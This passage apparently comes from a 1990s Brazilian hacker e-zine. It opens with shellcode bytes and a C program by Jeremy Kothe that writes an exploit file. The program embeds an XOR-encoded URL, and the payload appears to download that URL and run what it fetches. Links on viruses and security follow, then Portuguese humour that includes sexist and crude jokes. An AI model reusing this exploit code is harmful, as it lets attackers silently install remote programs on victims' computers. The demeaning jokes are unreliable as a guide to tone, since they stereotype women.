0x95, 0xBF, 0x9E, 0x8A, 0x95, 0x9D, 0x9B, 0xBD,

0x92, 0xBB, 0xBC, 0xB7, 0x96, 0xBB, 0xBB, 0xDE,

0x9C, 0xAA, 0x8A, 0xE4, 0xC8, 0xEE, 0xC9, 0xF0,

0xC9, 0xEE, 0xD4, 0xEC, 0xCB, 0xEC, 0xD4, 0xEF,

0xCA, 0x82, 0x9B, 0xF0, 0x9F, 0xA6, 0x9F, 0xDE,

0x92, 0xec, 0xc0, 0x9b, 0xb2, 0x66, 0x33, 0x53,

0xb9, 0x61, 0x35, 0xee, 0xd2, 0xae, 0xd4, 0xDE,

0xAD, 0xB7, 0x94, 0x9B, 0x82, 0xBB, 0x99, 0xDE,

0xB3, 0x01, 0xC1, 0xC3, 0x18, 0x8B, 0xD3, 0x8B,

0xF3, 0x66, 0xBA, 0xC0, 0x10, 0x8B, 0x12, 0x66,

0xBB, 0xB8, 0x10, 0x8B, 0x1B, 0x66, 0xBE, 0xC0,

0xC2, 0x8B, 0x36, 0x8B, 0x7C, 0x24, 0x04, 0x33,

0xC9, 0xB1, 0x2F, 0x66, 0x8B, 0x07, 0x66, 0x35,

0xDE, 0xFA, 0x66, 0x89, 0x07, 0x83, 0xC7, 0x02,

0xE0, 0xF1, 0x8B, 0x4C, 0x24, 0x04, 0x83, 0xC1,

0x06, 0x51, 0xFF, 0xD2, 0x8B, 0x4C, 0x24, 0x04,

0x83, 0xC1, 0x11, 0x51, 0x50, 0xFF, 0xD3, 0x8B,

0xD3, 0x8B, 0xD8, 0x8B, 0x4C, 0x24, 0x04, 0x83,

0xC1, 0x51, 0x51, 0x56, 0xFF, 0xD2, 0x8B, 0xF8,

0x8B, 0xEC, 0x81, 0xC4, 0xFF, 0xFB, 0xFF, 0xFF,

0x8B, 0x4D, 0x04, 0x83, 0xC1, 0x29, 0x33, 0xC0,

0x50, 0x50, 0x66, 0xB8, 0xFF, 0x03, 0x50, 0x8B,

0xC5, 0x05, 0xFF, 0xFB, 0xFF, 0xFF, 0x50, 0x51,

0x33, 0xC0, 0x50, 0xFF, 0xD3, 0x8B, 0xDC, 0x33,

0xC0, 0x50, 0x53, 0xFF, 0xD7, 0x33, 0xC0, 0x74,

0xFE, 0x62, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,

0x28, 0x01, 0xB9, 0x20, 0x61, 0x88, 0xFD, 0x56,

0x20, 0x0C, 0x02, 0xB9, 0x20, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01,

0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0xFC, 0x56,

};

int main( int argc, char *argv[] ) {

if( argc == 3 ) {

DWORD dwURLlen = strlen( argv[ 1 ] )+1;

if( dwURLlen < 40 ) {

HANDLE h = CreateFile(

argv[ 2 ],

GENERIC_WRITE,

0,

NULL,

CREATE_ALWAYS,

0,

0 );

if ( h == INVALID_HANDLE_VALUE ) {

printf( "Error creating %s\n", argv[ 2 ] );

return( 0 );

}

DWORD dwWrit = 0;

if( !WriteFile( h, aSploit, URL_OFFSET, &dwWrit, NULL ) ||

( dwWrit != URL_OFFSET ) )

goto writeerr;

for( char *p = argv[ 1 ]; ( *p ) && ( *(p+1) ); p+=2 )

*PWORD( p ) ^= 0xdefa; // 0xfade "little-endian"ed - should use

htons?

*PWORD( p ) ^= 0xdefa;

if( !WriteFile( h, argv[ 1 ], dwURLlen, &dwWrit, NULL ) ||

( dwWrit != dwURLlen ) )

goto writeerr;

DWORD dwToWrite = sizeof( aSploit ) - ( URL_OFFSET + dwURLlen );

if( !WriteFile( h, &aSploit[ URL_OFFSET+dwURLlen ], dwToWrite,

&dwWrit, NULL ) || ( dwWrit != dwToWrite ) )

goto writeerr;

CloseHandle( h );

return( 0 );

}

}

Usage();

return( 1 );

writeerr:

printf( "Error writing to %s\n", argv[ 2 ] );

return( 2 );

}

------------------------------------------------------------

P.S. Australian programmer with 19 years experience, C/++,

Asm, Delphi, SQL, IP + more, looking for work overseas.

Jeremy Kothe (jeremy@edi.com.au or paceflow@hotmail.com)

P.P.S. When exposing these type of exploits, it is usual

for the coder to launch into a tirade about Microsoft and

what terrible software it writes to allow these... I feel

that these people are missing the point, though. Microsoft

has risen (very successfully) to the challenge of providing

a couple of GENERAL PURPOSE, incredibly extensive operating

systems for PC's. Anyone who prefers Linux for it's

stability etc. should consider the cost (to the average

end-user) of such stability. Microsoft have concentrated

on the commercial requirements of the corporate Joe, and

have written the software people (not jellyheads) need. Of

course it would be wonderful if Windows was as solid as

secure as a unix installation, but it is simply not the

highest priority for the average PC user.

LINKS e INFO INTERESSANTE:

Páginas com informações sobre falsos vírus ou besteira eletrônica:

http://ciac.llnl.gov/ciac/CIACHoaxes.html

http://www.kumite.com/myths/

http://www.datafellows.com/news/hoax

http://www.symantec.com/avcenter/hoax.html

Checagem contra Trojans.

O Chaosmaker resolveu dar um exemplo de inventividade hacker e fez uma página que permite o sujeito saber se tem algum trojan rodando no seu micro (sem precisar instalar nenhum programa). Veja em

http://safescan.safenetworks.com/cgi-bin/safecgi?lang=pt

Saiu a última versão do BSD http://www.openbsd.org/

Como se livrar do Pretty Park

http://vil.nai.com/vil/vpe10175.asp

Algumas novidades sobre vírus de macro e suas variantes:

http://www.avpve.com/viruses/worms/bad_ass.html

http://vil.nai.com/vil/vm10385.asp

http://vil.nai.com/vil/vm10386.asp

http://www.zdnet.co.uk/news/specials/1999/03/virus/

O menor webserver do mundo: http://www-ccs.cs.umass.edu/%7Eshri/iPic.html

Página sobre o Djgpp na USP:  http://www.ime.usp.br/~jose/djgpp

Meu compilador favorito agora está de volta, numa bagagem GNU:  http://www.brain.uni-freiburg.de/~klaus/fpc/

Um programinha legal para fazer download de páginas http://www.ensicaen.ismra.fr/~roche/httrack.html

Linux Administration Security Guide - Um guia para administrar a segurança do seu site Linux. Não precisa gastar grana com livros que vão ficar obsoletos. Basta acessar http://www.securityportal.com/lasg

Versão em espanhol em: http://segurinet.com/gsal/default.htm

Algumas ferramentas úteis da Adobe, agora disponíveis via email:

Conversor de PDF p html via email Pdf2html@adobe.com

Conversor de PDF p txt via email Pdf2txt@adobe.com

A página onde se pode encontrar isso:http://access.adobe.com/simple_form.html

Acho q peguei essas dicas no Jornal da Tarde.. fotos gratuitas (freeware) para sites na web http://www.freefoto.com Site do 007 http://www.007.com

Outro site razoavel http://www.defenda-se.inf.br/

Um projeto maluco de um leitor que ainda não aprendeu (até ontem) quem meu nome é D-E-R-N-E-V-A-L. Mas vale a pena dar uma olhada http://pontobr.br

Para quem tem alguma curiosidade sobre como terminou o seriado da CAVERNA DO DRAGÃO http://www.mindspring.com/~michaelreaves/D&Dpreface.htmlhttp://welcome.to/caverna

Esta aqui é uma pagina muito doida, muito radical, sobre barulho das armas de fogo.. give peace a chance, man

Nemesis

Um bug de Internet Information Server http://www.securityfocus.com/templates/archive.pike?list=1&date=

1999-08-8&msg=37B5D87E.D6600553@urban-a.net

Subprodutoda confereência do CCC, ocorrida na Alemanha em Agosto. Uma conferência sobre como fazer seu caminho em IT (Information Technology) http://www.computerworld.com/home/news.nsf/all/9908124hackcareers

Tem mais história sobre a conferência em http://www.computerworld.com/home/news.nsf/all/9908124hackcareers e no http://www.ccc.de

Um site que promete: http://www.gamesarmy.cjb.net

5 megas de espaco p. salvar seus trabalhos (eu sei q tem sites oferecendo mais) http://www.filemonkey.com/scripts/t3cgi.exe/filemonkey.taf

Um página so' de links sobre discos voadores http://www.eldisco.com/links.cfm

Uma Comic-strip legal http://www.userfriendly.org/index.html

Museu do mousepad http://www.expa.hvu.nl/ajvdhek/

Anatel Agência Nacional de Telecomunicações - ANATEL - Destaques

Um D.O.S (Denial of Service) no http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=549

Um livro de código da 1a Guerra. Interessante, se vc e' interessado em cripto http://www.cix.co.uk/~klockstone/codebook.htm

Alguns links de jogos

Um site que fiz com download de material p. fazer joguinhos

ReBoots - Jogos On-line

http://www.emux.com/ Tudo sobre emuladores

MacGameNews - Jogos de Mac

ReBoots Guide to Internet Gaming

MacGameNews.com - Mac game news, reviews, codes and free games

GameStats News Network - Tips and Tricks

Jane's Combat Simulations - www.janes.ea.com

Jane's Game Demos

Zine Store

Links de vigilãncia e paranóia (Obs: não é paranóia se estão realmente te perseguindo):

http://www.usnews.com/usnews/issue/970623/23onli.htm

http://www.usnews.com/usnews/issue/980511/11mone.htm

http://www.redherring.com/mag/issue70/news-privacy.html

http://newsweek.com/nw-srv/issue/13_99a/printed/us/st/ty0113_1.htm

http://www.nytimes.com/library/cyber/week/061297privacy.html

http://webreview.com/pub/1999/06/18/platform/index.html

http://demographics.com/publications/mt/97_mt/9705_mt/mt97055.htm

HUMOR

Anos 90

Você ja' teve o bastante dos anos 90 se:

1. Você ja' chegou ao ponto de ter que colocar senha para usar o microondas.

2. Ha' anos voce ja' nao usa cartas de verdade para jogar paciencia.

3. Você pergunta aos seus colegas de trabalho na mesa ao lado via e- mail se alguem esta' a fim de tomar um chope e recebe resposta tambem via e-mail que "tudo bem, me da' so' 5 minutinhos".

4. Você dispoe de 15 numeros de telefone diferentes para se comunicar com os tres membros da sua familia.

5. Você conversa pelo chat varias vezes por dia com um sujeito nos Estados Unidos, mas esse ano ainda nao trocou uma palavra com o vizinho do lado.

6. Você compra um computador novo e uma semana depois ele ja' esta' ultrapassado.

7. O motivo de ter perdido o contato com seus amigos e' que eles nao tem e-mail.

8. Você ja' nao sabe mais quanto custa um selo.

9. Para voce, ser organizado significa ter aqueles adesivos de post-it em diversas cores.

10. A maior parte das piadas que voce conhece recebeu pelo e-mail.

11. Você atende dando o nome da firma onde trabalha, se o telefone toca de noite em casa.

12. Você disca primeiro o zero quando quer telefonar de casa.

13. Ja' faz 4 anos que voce esta' na mesma mesa e, ali mesmo, ja' trabalhou para 3 firmas diferentes.

14. O logo da firma onde voce trabalha muda todo ano para se adequar melhor ao seu novo conceito empresarial

15. Você sai pro trabalho quando ainda esta' escuro e quando volta tambem ja' escureceu.

16. Você tem um programa de configuracao que lhe mostra o numero de dias que faltam ate' a sua aposentadoria.

17. Quando alguem pergunta sua profissao, os seus pais dizem que voce "trabalha com computador".

18. Você so' reconhece os seus filhos gracas 'as fotos em cima da mesa no escritorio.

19. Você foi lendo essa lista e concordando com a cabeca...

20. E agora ja' esta' pensando para quem e' que vai mandar tambem.

A mulher na informática

A mulher e a informática surgiram na face da Terra em épocas bem distintas uma da outra.

Mesmo assim, podemos notar que existem muitas semelhanças entre as duas.

Veja a seguir a associação feita entre os tipos de mulheres e o mundo dos computadores:

Mulher Compilada: Aquela que sempre funciona em qualquer lugar com qualquer um.

Mulher Excel: Dizem que faz muitas coisas mas você só a utiliza para as quatro operações.

Mulher Norton Utilites: Serve apenas para melhorar o seu rendimento ou em caso de total emergência.

Mulher USB: Dizem que se conecta com qualquer dispositivo, mas ninguém tem.

Mulher Ergonômica: É aquela que se adapta às suas necessidades.

Mulher Network: É a que difunde os seus atributos a todas amigas.

Mulher Paintbrush: Serve apenas para seus filhos.

Mulher RAM: Aquela que esquece o que faz assim que desliga.

Mulher Disco Rigido: Aquela que se recorda de tudo o tempo todo.

Mulher Windows: Todo mundo sabe que não presta mas ninguen vive sem ela.

Mulher Encarta: Só o Bill Gates tem paciência para agüentar por mais de meia hora.

Mulher Windows 95: Já deu problema para 80% da humanidade e continua dando problema para os outros 20%. Mulher Mutimídia: Faz tudo parecer bonitinho.

Mulher GetRight: Serve para você conseguir outras de forma segura.

Mulher ScreenSaver: Não serve para nada, mas é bonitinha.

Mulher Mouse: Só funciona quando é arrastada e apertada.

Mulher Palmtop: Pequena, mas eficiênte.

Mulher Joystick: Vive deixando você com a mão suada e com cãibra no braço.

Mulher Soundblaster: Só a voz é que presta.

Mulher Univac: Velha, grande, meio lerda e esquenta rápido demais.

Mulher DOS: Todos usaram algum dia mas agora ninguém quer.

Mulher BASIC: Todos usaram algum dia, mas agora ninguém com mais de 12 anos de idade aguenta.

Mulher AMD: Boa, bonita e mais barata.

Mulher Backup: Sempre voçê acha que tem mas na hora do "vamo-vê" não funciona.

PIADAS DE ENGENHEIROS (Se você gostou do "como paquerar um Nerd"..)

Voce e' um engenheiro (ou pelo menos tem vocacao para isso) se voce

responder afirmativamente a aproximadamente 3,287 % das afirmacoes abaixo:

- Vc sabe calculo vetorial, mas nao lembra como fazer uma divisao com

virgula.

- Você tem uma calculadora científica e conhece TODAS as suas funções.

- Vc ja' usou o AutoCAD para projetar uma pipa para o seu filho.

- Vc ja' passou horas realizando o relatorio de um experimento que durou

alguns segundos.

- Vc tem um bichinho de estimacao com o nome de um grande cientista.

- Vc ri de piadas sobre matematicos.

- Vc considera qualquer curso nao-cientifico como "facil" ou "sub-curso".

- Vc nao entende como algumas pessoas podem achar dificil programar um

videocassete.

- Vc assistiu "Apollo 13" e achou que os verdadeiros herois foram os caras

no "Controle da Missao".

- Vc assume que um "cavalo" e' equivalente a uma "ponto no espaco" para

facilitar os calculos.

- Uma crianca de quatro anos lhe pergunta por que o ceu e' azul e vc tenta

explicar toda a teoria da absorcao atmosferica ou do espalhamento

eletro-magnetico que um amigo físico lhe explicou certa

vez.

- Vc vai a uma loja de informatica e os vendedores nao conseguem responder

suas perguntas.

- Vc costuma assobiar a musica tema de "MacGyver".

- O que vc mais gosta no Natal e' montar os brinquedos das criancas.

- Vc ja' tentou consertar alguma coisa usando elasticos, clipes de papel e

fita adesiva.

- Seu PC vale mais do que um carro.

- Vc pode lembrar de 7 senhas de computador, mas nao da data do aniversario

da sua mae.

- Vc sabe qual sera' o sentido de rotacao da agua quando puxar a descarga.

- Vc esta' sendo processado pela Sociedade Protetora dos Animais por

realmente ter realizado o experimento do Gato de Schrodinger.

- Vc SABE o que e' o experimento do Gato de Schrodinger.

- Vc consegue digitar 70 palavras por minuto, mas nao entende sua propria

caligrafia.

- Vc ja' abriu alguma coisa "so' para ver como e' por dentro".

- Vc guarda pecas de eletrodomesticos estragados.

- Vc assiste filmes de ficcao cientifica e fica procurando cenas ou

argumentos que estao cientificamente incorretos.

- Vc tem o habito de estragar coisas tentando descobrir como elas funcionam.

- A maior parte das piadas que vc recebe vem por e-mail.

(Peguei na lista piadas-l@listas.ansp.br - Silvia R.G.)

Installing Love   Can You Install Love?  Customer Service Rep: Can you install LOVE?  Customer: I can do that. I'm not very technical, but I think I am ready to install now. What do I do first?  CS Rep: The first step is to open your HEART. Have you located your HEART ma'am?  Customer: Yes I have, but there are several programs running right now. Is it okay to install while they are running?  CS Rep: What programs are running ma'am?  Customer: Let me see....I have PASTHURT.EXE, LOWESTEEM.EXE, GRUDGE.EXE, and RESENTMENT.COM running right now.  CS Rep: No problem. LOVE will automatically erase PASTHURT.EXE from your current operating system. It may remain in your permanent memory, but it will no longer disrupt other programs. LOVE will eventually overwrite LOWESTEEM.EXE with a module of its own called HIGHESTEEM.EXE. However, you have to completely turn off GRUDGE.EXE and RESENTMENT.COM. Those programs prevent LOVE from being properly installed. Can you turn those off ma'am?  Customer: I don't know how to turn them off. Can you tell me how?  CS Rep: My pleasure. Go to your Start menu and invoke FORGIVENESS.EXE. Do this as many times as necessary until GRUDGE.EXE and RESENTMENT.COM have been completely erased.  Customer: Okay, I'm done. LOVE has started installing itself automatically. Is that normal?  CS Rep: Yes it is. You should receive a message that says it will reinstall for the life of your HEART. Do you see that message?  Customer: Yes I do. Is it completely installed?  CS Rep: Yes, but remember that you have only the base program. You need to begin connecting to other HEARTS in order to get the upgrades.  Customer: Oops...I have an error message already. What should I do?  CS Rep: What does the message say?  Customer: It says "ERROR 412 - PROGRAM NOT RUN ON INTERNAL COMPONENTS." What does that mean?  CS Rep: Don't worry ma'am, that's a common problem. It means that the LOVE program is set up to run on external HEARTS but has not yet been run on your HEART. It is one of those complicated programming things, but in non-technical terms it means you have to "LOVE" your own machine before it can "LOVE" others.  Customer: So what should I do?  CS Rep: Can you find the directory called "SELF-ACCEPTANCE"?  Customer: Yes, I have it.  CS Rep: Excellent, you are getting good at this.  Customer: Thank you.  CS Rep: You're welcome. Click on the following files and then copy them to the "MYHEART" directory: FORGIVESELF.DOC SELFESTEEM.TXT, REALIZEWORTH.TXT, and GOODNESS.DOC. The system will overwrite any conflicting files and begin patching any faulty programming. Also, you need to delete SELFCRITIC.EXE from all directories, and then empty your recycle bin afterwards to make sure it is completely gone and never comes back.  Customer: Got it. Hey! My HEART is filling up with really neat files. SMILE.MPG is playing on my monitor right now and it shows that WARMTH.COM, PEACE.EXE, and CONTENTMENT.COM are copying themselves all over my HEART!  CS Rep: Then LOVE is installed and running. You should be able to handle it from here. One more thing before I go...  Customer: Yes?  CS Rep: LOVE is freeware. Be sure to give it and its various modules to everybody you meet. They will in turn share it with other people and they will return some really neat modules back to you.  Customer: I will. Thank you for your help.  --------------------------------------------------      COMPREENDENDO OS ENGENHEIROS   Compreendendo os Engenheiros ( 1 )   Dois estudantes de engenharia estavam caminhando pelo campus quando  um  deles disse:          -Onde você conseguiu essa magnífica bicicleta ?   O segundo respondeu:          -Bem, eu estava caminhando por aí ontem, pensando em meus trabalhos, quando apareceu uma formosa mulher com esta bicicleta. Atirou a bicicleta  ao solo,tirou toda a sua roupa e disse:  "Pega o que quiser".    O primeiro engenheiro acenou afirmativamente:          -Boa escolha! A roupa provavelmente não teria servido para você!".    * * *   Compreendendo os Engenheiros ( 2 )   Um arquiteto, um artista e um engenheiro estavam discutindo se era  melhor  passar o tempo com a mulher ou com a amante. O arquiteto  disse que gostava  de passar o tempo com sua mulher, construindo uma  base sólida para uma relação duradoura. O artista disse que gostava  de passar o tempo com sua  amante, porque com ela encontrava paixão  e mistério.  O engenheiro disse:         - Eu gosto das duas         -As duas?!         -Sim. Se tens uma mulher e uma amante, cada uma delas acha que você está  passando o tempo com a outra, e você poder ir para a empresa terminar o  trabalho!   * * *   Compreendendo os Engenheiros ( 3 )   Qual a diferença entre os engenheiros e os arquitetos?  Os engenheiros constroem armas, os arquitetos construem alvos.   * * *   Compreendendo os Engenheiros ( 4 )   Para o otimista, o copo está meio cheio.  Para o pessimista, o copo está meio vazio.  Para o engenheiro, o copo está duas vezes maior do que deveria ser.    * * *   Compreendendo os Engenheiros (5)   Um engenheiro estava atravessando uma estrada um dia, quando um sapo  o  chamou e lhe disse:          -Se me beijar, me transformarei em uma formosa princesa.    O engenheiro se inclinou, pegou o sapo e o pôs no bolso.  O sapo voltou a falar, e disse:          -Se me beijar para que me transforme em uma formosa princesa, ficarei com  você durante uma semana.    O engenheiro tirou o sapo do bolso, sorriu para ele e voltou a pô-lo no  bolso.  Então o sapo gritou:          -Se me beijar eu me transformarei em uma formosa princesa, ficarei com  você e farei tudo o que quiser.   Outra vez o engenheiro pegou o sapo, sorriu para ele e o pôs de novo no  bolso.  Finalmente o sapo perguntou:          -O que é que está acontecendo? Eu disse que sou uma formosa princesa, que  ficarei com você por uma semana e farei tudo o que quiser. Por que você não me beija?    O engenheiro disse:          -Veja, eu sou um engenheiro. Não tenho tempo para namoradas, mas um sapo  que fala, isso sim é interessante !!  -------------------------------------------------- Namoro na Net  Certa jovem universitária que prefere manter-se incógnita, a quem chamaremos de Jill, estava cursando a faculdade de ciência da computação numa universidade nos EUA. Para quem conhece a vida universitária americana, o dia-a- dia de um estudante consiste de um pouco de estudo e de *muita* festança e gandaia.  O caso de Jill não era diferente, sempre correndo atrás de suas obrigações acadêmicas, mas com as antenas ligadonas na vida selvagem que curtia com os amigos. Mas não se podia falar mal de Jill, que também era fera em computação.  Não era sem esforço que conseguia brilhar nos estudos. Quando não estava se divertindo, enfiava a cara pra valer nos trabalhos e ralava pesado projetando programas, escrevendo código e instalando software. Certa feita, poucos dias depois de ter rompido com um namorado, estava a nossa Jill em casa numa sexta à noite. Era a primeira vez em três anos que se via livre nesse dia sagrado da semana, pois normalmente estaria com o namorado.  Era normal que se sentisse no maior baixo-astral. Para encher o tempo e afastar o fantasma da saudade, decidiu fazer uma nova home page. Lá pelas tantas, depois de algumas horas de links e tabelas, cansou-se daquilo e entrou numa sala de chat para relaxar um pouco.  Sendo uma menina fogosa e ainda curtindo a dor de cotovelo, optou por um chat de sexo e começou a brincar com quem estava on-line. Foi quando tudo começou. Jill conheceu um camarada no chat chamado Mike. Claro que não era o nome verdadeiro dele. Obviamente ela também não disse seu nome real: optou por se chamar "Nancy".  Começaram os dois a brincar com aquele jogo excitante da fantasia, entrando em minuciosos detalhes sobre o que fariam se estivessem juntos em algum lugar sossegado, à meia luz. É desnecessário dizer o quão alto podem voar duas pessoas envolvidas em chats desse tipo. É o que se chama de ciber-sexo e, se os parceiros virtuais forem hábeis no manejo do teclado e conseguirem se soltar razoavelmente na linguagem escrita, o resultado pode ser incrivelmente prazeiroso.  A coisa pegou fogo e alguns minutos mais tarde estavam se despedindo, concordando em se encontrarem no dia seguinte. Chegou a noite de sábado e lá estavam eles, provocando-se novamente.  Aproximaram-se ainda mais nessa segunda tentativa e os encontros virtuais foram se repetindo. Acabaram papeando on-line a semana toda, sempre terminando a conversa com erupções vulcânicas, terremotos e tornados. Na outra segunda-feira, o colóquio se desviou para assuntos mais íntimos, desta vez aproximando-os como pessoas, fazendo com que compartilhassem questões particulares e sentimentos.  Os dois sentiam suas almas cada vez mais próximas, suas vidas se entrelaçando e a relação se tornando mais intensa e complexa. Jill não queria revelar que era uma universitária em início de curso, pois temia que Mike a achasse imatura. Sentiu-se meio culpada, mas superou essa fase, passando a gostar cada vez mais do Mike que parecia um cara fascinante, vivido e agradável. Os e-mails que trocavam eram apaixonados e inflamáveis.  A troca de energias prolongou-se por meses, até que comemoraram um ano desde o primeiro chat. Já haviam contado seus pensamentos mais secretos e, mesmo assim, nunca trocaram fotos nem tiveram coragem de falar ao telefone.  Morriam de medo de destruir o clima de mistério. Haviam feito tudo que era sexualmente possível via Internet, mas não sem um profundo afeto. Era natural que passassem a ansiar por um encontro físico, real. Num belo dia, os dois decidiram que era hora de se conhecerem. Estavam se amando e não se importavam com idade, aparência física, coisa nenhuma.  Queriam apenas um ao outro, loucamente. Mike disse a Jill que ela poderia até ser sua próxima esposa. Ela ficou meio assustada a princípio. E se ele fosse velho? E se fosse feio? Ora, que se dane. Ela o amava e isso bastava. Era o único cara com quem se sentia confortável.  Planejaram então uma viagem para uma cidade do interior, onde passariam um fim-de-semana juntos. Ia ser o máximo! Imagine a leitora o friozinho na barriga que os dois sentiam só em pensar no encontro. Jill não queria o trabalho de ter que reconhecer o Mike, portanto pediu a ele que agitasse um aposento num hotel e eles se encontrariam direto no quarto. Mike topou no ato.  No dia aprazado, a nervosa Jill chegou, apresentou-se como Nancy à recepcionista e foi se instalar no quarto reservado pelo Mike, que chegaria em alguns minutos.  Entrou no quarto, inspecionou as instalações e pôs-se a preparar um ambiente romântico e especial para a ocasião. Acendeu velas perfumadas, ligou um som gostoso, tirou a roupa e deitou na cama, para fazer uma surpresa para o amado. Quando ele chegou, meteu a chave na porta com cuidado e chamou sussurrando: "Nancy!".  Ela, emocionada, respondeu, quase sem ar: "Mike, estou aqui". Ele apalpou a parede junto à porta em busca do interruptor, acendeu a luz e viu Jill nua sobre a cama. O que se ouviu depois naquele hotel foram dois gritos lancinantes, um grosso e outro esganiçado. Jill cobriu-se imediatamente e, com sua voz mais humilhada, disse ofegante e pasma:  "Papaai!"  (Luis C) ---------------------------------------------  >> Um analista de sistemas meio introvertido finalmente conseguiu realizar o >> sonho da sua vida: um cruzeiro. Estava começando a desfrutar da viagem >> quando um furacão virou o navio como se fosse uma caixa de fósforos. O >> rapaz conseguiu agarrar-se a um salva-vidas e chegar a uma ilha >> aparentemente deserta e muito escondida. Deparou com uma cena belíssima: >> cachoeira, bananas, coqueiros... mas quase nada além disso. Ele se sentiu >> desesperado e completamente abandonado. >> Vários meses se passaram e um belo dia apareceu, remando, uma belíssima >> moça, mistura de Sharon Stone com Cindy Crawford. A moça começou uma >> conversa: >> * Eu sou do outro lado da ilha. Você também estava no cruzeiro? >> * Estava! Mas onde conseguiu esse bote? >> * Simples! Tirei alguns galhos de árvores, sangrei alguma borracha, >> reforcei os galhos, fiz a quilha e os remos com madeira de eucalipto. >> * Mas... com que ferramentas? >> * Bom, achei uma camada de material rochoso, evidentemente formada por >> aluviões. Eu descobri que esquentando este material a uma certa >> temperatura, ele assumia uma forma muito maleável. >> Mas chega disso! Onde você tem vivido esse tempo todo? Não vejo nada >> parecido com um teto... >> * Para ser franco, eu tenho dormido na praia... >> * Quer vir a minha casa? >> * O analista de sistemas aceitou, meio sem jeito. A moça remou com extrema >> destreza ao redor da ilha. Quando chegou no "seu" lado, amarrou a canoa >com >> uma corda que mais parecia uma obra prima de artesanato. Os dois >caminharam por uma passarela de pedras construída pela moça e depararam, >atrás de um coqueiro, com um lindo chalé pintado de azul e branco. >> * Não é muito, disse ela, mas eu o chamo de "lar". >> Já dentro, ela convidou: >> * Sente-se, por favor! Aceita um drinque? >> * Não, obrigado! Não aguento mais água de coco! >> * Mas não é água de coco! Eu tenho um alambique meio rudimentar lá fora, >de >> forma que podemos tomar Pinas-coladas autênticas! >> Tentando esconder a surpresa, o analista aceitou. Sentaram no sofá dela >> para conversar. Depois de contarem suas histórias, a moça perguntou: >> * Você sempre teve barba? >> * Não. Toda a vida eu andei bem barbeado. >> * Bom, se quer se barbear, tem uma navalha lá em cima, no armarinho do >> banheiro. >> O homem achou que a moça estava de sacanagem, mas foi assim mesmo. Lá em >cima, surpreso, fez a barba com um complicado aparelho feito de osso e >> conchas, tão afiado quanto uma navalha. >> A seguir, tomou um bom banho, sem nem querer arriscar palpites sobre como >> ela tinha água quente no banheiro. Desceu sem poder deixar de se >maravilhar >> com o acabamento do corrimão. >> * Você ficou ótimo! Vou lá em cima também me trocar por algo mais >> confortável. >> Nosso herói continuou bebericando sua pina colada. Em instantes, a moça >> estava de volta, com um delicioso perfume de gardênias, e vestindo um >> estonteante e revelador robe, muito bem trabalhado em folhas de palmeira. >> * Bom - disse ela - ambos temos passado um longo tempo sem qualquer >> companhia... Você não tem se sentido solitário? Ha alguma coisa de que >você >> sente muita saudade? Que lhe faz muita falta e do qual todos os homens e> >> mulheres precisam? >> * Mas é claro! - disse ele esquecendo um pouco sua timidez. Tem algo que >> venho querendo todo esse tempo. Mas... aqui nesta ilha... sabe como é... >> era simplesmente impossível. >> * Bom - disse ela - já não é mais impossível, se é que você me entende... >> O rapaz, tomado de uma excitação incontrolável, disse, quase sem alento: >> * Não acredito! Você não está querendo dizer que... você bolou um jeito de >> pegar os seus e-mails aqui, na ilha? >> ------------------------------------------ VOCÊ É UM CONSULTOR OU UMA PROSTITUTA?   1. Você trabalha em horários malucos  2. Você recebe uma nota preta para deixar o cliente feliz  3. Você recebe uma boa grana mas é o cafetão que fica com a maior parte  4. Você passa a maior parte de seu tempo de trabalho num quarto de hotel  5. Você cobra por hora mas pode extender o tempo  6. Você não se orgulha do que faz  7. Você é pago para criar fantasias em seus clientes  8. É difícil ter uma família  9. Você não tem satisfação no seu trabalho 10. Se um cliente não gostou de você, o cafetão te manda para outro     cliente 11. Você fica constrangido em contar às pessoas o que você faz para viver 12. Seu cliente paga pelo seu trabalho mais a despesa do hotel 13. Seu cliente sempre quer saber quanto você cobra e o que ele vai ter     direito 14. O cafetão dirige carros de luxo como Mercedes ou BMW 15. Você sabe que o cafetão cobra mais do que você vale mas se o     cliente é burro não é problema seu 16. Quando você vai no cliente, você tem uma cara ótima, mas quando sai     está um horror (comparando com sua cara na segunda de manhã com a de     sexta à tarde) 17. Você é avaliado pela sua "performance" num trabalho vergonhoso 18. Embora você ganhe uma boa grana, seu cliente é que sai com a cara     feliz 19. O cliente sempre acha que está pagando mais do que deveria, e, por     outro lado, espera que voê faça milagres 20. 